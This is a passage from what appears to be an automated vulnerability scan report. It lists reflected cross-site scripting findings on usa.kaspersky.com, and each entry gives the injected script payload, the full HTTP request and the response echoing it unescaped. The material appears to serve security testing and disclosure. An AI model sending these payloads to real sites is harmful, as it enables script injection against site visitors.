<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-securitya91a9"-alert(1)-"929e765b02d/pure?ICID=INT1673886";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.127. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fedd"><script>alert(1)</script>9235e22f1fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security6fedd"><script>alert(1)</script>9235e22f1fb/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:01:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141295"
Content-Type: text/html; charset=utf-8
Content-Length: 39595
Date: Sun, 04 Sep 2011 13:01:50 GMT
X-Varnish: 1163114026
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security6fedd"><script>alert(1)</script>9235e22f1fb/pure?ICID=INT1673886" />
...[SNIP]...

1.128. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4455"><script>alert(1)</script>c974b3a38d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/puree4455"><script>alert(1)</script>c974b3a38d1?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:04:21 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141461"
Content-Type: text/html; charset=utf-8
Content-Length: 38838
Date: Sun, 04 Sep 2011 13:04:28 GMT
X-Varnish: 1163118395
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/puree4455"><script>alert(1)</script>c974b3a38d1?ICID=INT1673886" />
...[SNIP]...

1.129. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3516d"-alert(1)-"539626fa5f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/pure3516d"-alert(1)-"539626fa5f8?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:03 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141503"
Content-Type: text/html; charset=utf-8
Content-Length: 40379
Date: Sun, 04 Sep 2011 13:05:14 GMT
X-Varnish: 1163119547
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
eName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/pure3516d"-alert(1)-"539626fa5f8?ICID=INT1673886";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.130. http://usa.kaspersky.com/products-services/home-computer-security/pure [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b09c3"><script>alert(1)</script>346be129cf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/pure?ICID=INT1673886&b09c3"><script>alert(1)</script>346be129cf5=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:51:22 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140682"
Content-Type: text/html; charset=utf-8
Content-Length: 107162
Date: Sun, 04 Sep 2011 12:51:33 GMT
X-Varnish: 1163095907
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886&b09c3"><script>alert(1)</script>346be129cf5=1" />
...[SNIP]...

1.131. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79397"><script>alert(1)</script>d1dc6a9e10c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services79397"><script>alert(1)</script>d1dc6a9e10c/home-computer-security/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:23 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142003"
Content-Type: text/html; charset=utf-8
Content-Length: 40598
Date: Sun, 04 Sep 2011 13:13:30 GMT
X-Varnish: 1163134441
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services79397"><script>alert(1)</script>d1dc6a9e10c/home-computer-security/tablet-security" />
...[SNIP]...

1.132. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d244"-alert(1)-"79edbca8ad5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services3d244"-alert(1)-"79edbca8ad5/home-computer-security/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142028"
Content-Type: text/html; charset=utf-8
Content-Length: 39984
Date: Sun, 04 Sep 2011 13:13:50 GMT
X-Varnish: 1163135362
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services3d244"-alert(1)-"79edbca8ad5/home-computer-security/tablet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.133. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e07ce"><script>alert(1)</script>42a4c5f2575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securitye07ce"><script>alert(1)</script>42a4c5f2575/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:14:41 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142081"
Content-Type: text/html; charset=utf-8
Content-Length: 40666
Date: Sun, 04 Sep 2011 13:14:47 GMT
X-Varnish: 1163137262
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securitye07ce"><script>alert(1)</script>42a4c5f2575/tablet-security" />
...[SNIP]...

1.134. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f780"-alert(1)-"e86bf53504a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security3f780"-alert(1)-"e86bf53504a/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:15:00 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142100"
Content-Type: text/html; charset=utf-8
Content-Length: 40757
Date: Sun, 04 Sep 2011 13:15:04 GMT
X-Varnish: 1163137923
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security3f780"-alert(1)-"e86bf53504a/tablet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.135. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0c99"-alert(1)-"685c02abd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/tablet-securitya0c99"-alert(1)-"685c02abd53 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:16:13 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142173"
Content-Type: text/html; charset=utf-8
Content-Length: 40821
Date: Sun, 04 Sep 2011 13:16:17 GMT
X-Varnish: 1163140388
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/tablet-securitya0c99"-alert(1)-"685c02abd53";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.136. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25dc"><script>alert(1)</script>d322e4cce32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/tablet-securityb25dc"><script>alert(1)</script>d322e4cce32 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:16:00 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142160"
Content-Type: text/html; charset=utf-8
Content-Length: 40731
Date: Sun, 04 Sep 2011 13:16:03 GMT
X-Varnish: 1163139925
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/tablet-securityb25dc"><script>alert(1)</script>d322e4cce32" />
...[SNIP]...

1.137. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
